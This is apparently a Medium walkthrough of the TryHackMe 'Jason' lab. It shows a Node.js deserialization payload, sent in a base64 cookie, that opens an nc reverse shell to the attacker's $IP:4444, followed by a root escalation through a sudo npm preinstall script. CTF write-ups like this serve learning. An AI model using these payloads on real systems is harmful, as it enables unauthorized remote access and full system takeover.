TryHackME: Jason

Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78

Let’s take a look at the website.

Let’s enter something and look at the query with burp

And we see it is built with node js . I figured there would be a vulnerability related to json & node.js . So I researched a bit and found out there is a RCE vulnerability .

I have prepared such a code for operation.

{“email”:”test”,”rce”:”_$$ND_FUNC$$_function(){ require(‘child_process’).exec(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f’, function(error, stdout, stderr) { console.log(stdout) }); }()”}

Since we have to use cookies, I encrypt with base64.

Let’s paste to the cookie and listen.

When we refresh the page, we get a shell.

Privilege Escalation

Comman: sudo -l

Let’s exploit

Command: TF=$(mktemp -d)

Command: echo ‘{“scripts”: {“preinstall”: “/bin/bash”}}’ > $TF/package.json

Command: sudo /usr/bin/npm -C $TF --unsafe-perm i

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Code-Push with App Center

Closures in JavaScript

Push Notification in React Native With OneSignal(Android)

Let’s understand react portals!

The contest ended and the awards were distributed, I like to make memes.

How We Used Connected React Router to Create Bookmarkable Pages

Learn react in 5 minutes…more or less

first react app

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

TryHackMe: Develpy

TryHackMe: Network Fundamentals — What is Networking Walkthrough

UltraTech Try Hack Me Walkthough

World Cup Simulator — Week 1